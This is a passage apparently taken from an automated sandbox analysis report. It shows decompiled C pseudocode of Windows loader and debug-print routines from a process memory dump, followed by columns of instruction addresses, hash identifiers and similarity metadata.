					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E048ED130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E048DD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E048DF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L048EDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E048DB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E048DB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E048DE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E048DA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                        0x0489b171
                                                        0x0489b171
                                                        0x0489b171
                                                        0x0489b171
                                                        0x0489b171
                                                        0x0489b176
                                                        0x0489b17b
                                                        0x0489b180
                                                        0x0489b186
                                                        0x0489b18f
                                                        0x0489b198
                                                        0x0489b1a4
                                                        0x0489b1aa
                                                        0x048f4802
                                                        0x048f4802
                                                        0x048f4805
                                                        0x048f480c
                                                        0x048f480e
                                                        0x0489b1d1
                                                        0x0489b1d3
                                                        0x0489b1de
                                                        0x0489b1de
                                                        0x048f4817
                                                        0x048f481e
                                                        0x048f4820
                                                        0x048f4822
                                                        0x048f4822
                                                        0x048f4824
                                                        0x048f4824
                                                        0x048f482a
                                                        0x00000000
                                                        0x00000000
                                                        0x048f4835
                                                        0x048f483a
                                                        0x048f483d
                                                        0x048f483f
                                                        0x048f4842
                                                        0x048f4842
                                                        0x048f4842
                                                        0x048f4846
                                                        0x048f484c
                                                        0x048f484e
                                                        0x048f4851
                                                        0x048f4851
                                                        0x048f4853
                                                        0x048f4854
                                                        0x048f4854
                                                        0x048f4858
                                                        0x048f485a
                                                        0x048f485a
                                                        0x048f485d
                                                        0x048f485f
                                                        0x048f4861
                                                        0x048f4861
                                                        0x048f4866
                                                        0x048f486b
                                                        0x048f486e
                                                        0x048f4871
                                                        0x048f4876
                                                        0x048f4876
                                                        0x048f4878
                                                        0x048f487b
                                                        0x048f4884
                                                        0x048f4884
                                                        0x00000000
                                                        0x048f487d
                                                        0x048f487d
                                                        0x048f4882
                                                        0x048f4889
                                                        0x048f4889
                                                        0x048f488f
                                                        0x048f4891
                                                        0x048f48e0
                                                        0x048f48e2
                                                        0x048f48e4
                                                        0x048f48e4
                                                        0x048f48e7
                                                        0x048f48e7
                                                        0x048f48ed
                                                        0x048f48f4
                                                        0x048f48f6
                                                        0x048f4951
                                                        0x048f4951
                                                        0x048f4953
                                                        0x048f4953
                                                        0x048f4956
                                                        0x048f4956
                                                        0x048f4958
                                                        0x048f4959
                                                        0x048f4959
                                                        0x048f495d
                                                        0x048f495d
                                                        0x048f495f
                                                        0x048f495f
                                                        0x048f4965
                                                        0x048f4969
                                                        0x048f49ba
                                                        0x048f49ba
                                                        0x048f49c1
                                                        0x048f49c5
                                                        0x048f49cc
                                                        0x048f49d4
                                                        0x048f49d7
                                                        0x048f49da
                                                        0x048f49e4
                                                        0x048f49e5
                                                        0x048f49f3
                                                        0x048f4a02
                                                        0x00000000
                                                        0x048f4a02
                                                        0x048f4972
                                                        0x048f4974
                                                        0x00000000
                                                        0x00000000
                                                        0x048f4976
                                                        0x048f4979
                                                        0x048f4982
                                                        0x048f4983
                                                        0x048f4984
                                                        0x048f498b
                                                        0x048f498d
                                                        0x048f4991
                                                        0x048f4993
                                                        0x048f4999
                                                        0x048f499d
                                                        0x048f49a2
                                                        0x048f49a2
                                                        0x048f49a2
                                                        0x048f4999
                                                        0x048f49ac
                                                        0x00000000
                                                        0x048f49b3
                                                        0x048f48f8
                                                        0x048f48fe
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048f48fe
                                                        0x048f4895
                                                        0x048f489c
                                                        0x048f48ad
                                                        0x048f48b2
                                                        0x048f48b5
                                                        0x048f48b7
                                                        0x048f48ba
                                                        0x048f48bc
                                                        0x048f48c6
                                                        0x048f48c6
                                                        0x048f48cb
                                                        0x048f48d1
                                                        0x048f48d4
                                                        0x048f48d8
                                                        0x048f48d8
                                                        0x00000000
                                                        0x048f48d8
                                                        0x048f48be
                                                        0x048f48c0
                                                        0x00000000
                                                        0x00000000
                                                        0x048f48c2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048f48c4
                                                        0x00000000
                                                        0x048f4882
                                                        0x048f487b
                                                        0x048f4904
                                                        0x048f4906
                                                        0x00000000
                                                        0x00000000
                                                        0x048f4908
                                                        0x048f490e
                                                        0x00000000
                                                        0x00000000
                                                        0x048f4910
                                                        0x048f4917
                                                        0x048f4917
                                                        0x00000000
                                                        0x048f4917
                                                        0x0489b1ba
                                                        0x048f47f9
                                                        0x048f47fc
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x048f47fc
                                                        0x0489b1c0
                                                        0x0489b1c0
                                                        0x0489b1c3
                                                        0x0489b1cb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.925673128.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: true
                                                        • Associated: 00000013.00000002.925824300.000000000498B000.00000040.00000001.sdmp Download File
                                                        • Associated: 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID: _vswprintf_s
                                                        • String ID:
                                                        • API String ID: 677850445-0
                                                        • Opcode ID: 467c8eb47a6fac56e88a57a02fe3ca73740739949bd0d3c1a78befb4884ae528
                                                        • Instruction ID: 50e36524f15b30d2c6b4335e5f0e5f3b82ed3b3171f26d28dc4e54e78ec9802f
                                                        • Opcode Fuzzy Hash: 467c8eb47a6fac56e88a57a02fe3ca73740739949bd0d3c1a78befb4884ae528
                                                        • Instruction Fuzzy Hash: 1351FF71E102598EEF31CF688840BAEBBF0BF10B14F104BAAD959EB691D37069419B81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048AD5E0, Relevance: 1.6, Strings: 1, Instructions: 353COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 87%
                                                        			E048AD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x498d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E048A6600(0x49852d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x4987b9c; // 0x0
							_t281 = L048B4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E048DF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x4987b90; // 0x770b0000
								if(_t384 == 0) {
									_t353 =  *0x4987b8c; // 0x261d40
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x263f68
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E048B2280(_t200, 0x49884d8);
									_t277 =  *0x49885f4; // 0x262d78
									_t351 =  *0x49885f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x768d0000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x262108
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x262d10
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x262108
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x262f68
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E048AFFB0(_t287, _t353, 0x49884d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E048ECC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E048A6600(0x49852d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E048A7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x498b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0491E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x4988472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x498b218; // 0x0
														asm("ror edi, cl");
														 *0x498b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E048B2280(_t250, 0x49884d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L048D3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E048AFFB0(_t293, _t353, 0x49884d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E048D37F5(_t353, 0);
																}
																E048D0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E048C9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E048C02D6(_t174);
																}
																L048B77F0( *0x4987b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E048CC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L048AEC7F(_t353);
										L048C19B8(_t287, 0, _t353, 0);
										_t200 = E0489F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L048B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E048DB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x498b2f8; // 0xdf0000
									if((_t206 |  *0x498b2fc) == 0 || ( *0x498b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x498b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04946B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04946AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E048AE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L048AEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E048D9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E048AE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L048A8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E048D3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                        0x048ad5f2
                                                        0x048ad5f5
                                                        0x048ad5f5
                                                        0x048ad5fd
                                                        0x048ad600
                                                        0x048ad60a
                                                        0x048ad60d
                                                        0x048ad617
                                                        0x048ad61d
                                                        0x048ad627
                                                        0x048ad62e
                                                        0x048ad911
                                                        0x048ad913
                                                        0x00000000
                                                        0x048ad919
                                                        0x048ad919
                                                        0x048ad919
                                                        0x048ad634
                                                        0x048ad634
                                                        0x048ad634
                                                        0x048ad634
                                                        0x048ad640
                                                        0x048ad8bf
                                                        0x00000000
                                                        0x048ad646
                                                        0x048ad646
                                                        0x048ad64d
                                                        0x048ad652
                                                        0x048fb2fc
                                                        0x048fb2fc
                                                        0x048fb302
                                                        0x048fb33b
                                                        0x048fb341
                                                        0x00000000
                                                        0x048fb304
                                                        0x048fb304
                                                        0x048fb319
                                                        0x048fb31e
                                                        0x048fb324
                                                        0x048fb326
                                                        0x048fb332
                                                        0x048fb347
                                                        0x048fb34c
                                                        0x048fb351
                                                        0x048fb35a
                                                        0x00000000
                                                        0x048fb328
                                                        0x048fb328
                                                        0x00000000
                                                        0x048fb328
                                                        0x048fb326
                                                        0x048ad658
                                                        0x048ad658
                                                        0x048ad65b
                                                        0x048ad665
                                                        0x00000000
                                                        0x048ad66b
                                                        0x048ad66b
                                                        0x048ad66b
                                                        0x048ad66b
                                                        0x048ad66d
                                                        0x048ad672
                                                        0x048ad67a
                                                        0x00000000
                                                        0x00000000
                                                        0x048ad680
                                                        0x048ad686
                                                        0x048ad8ce
                                                        0x048ad8d4
                                                        0x048ad8da
                                                        0x048ad8dd
                                                        0x048ad8dd
                                                        0x048ad8e0
                                                        0x048ad68c
                                                        0x048ad691
                                                        0x048ad69d
                                                        0x048ad6a2
                                                        0x048ad6a7
                                                        0x048ad6b0
                                                        0x048ad6b0
                                                        0x048ad6b5
                                                        0x048ad6e0
                                                        0x048ad6b7
                                                        0x048ad6b7
                                                        0x048ad6b9
                                                        0x048ad6b9
                                                        0x048ad6bb
                                                        0x048ad6bd
                                                        0x048ad6ce
                                                        0x048ad6d0
                                                        0x048ad6d2
                                                        0x048fb363
                                                        0x048fb365
                                                        0x00000000
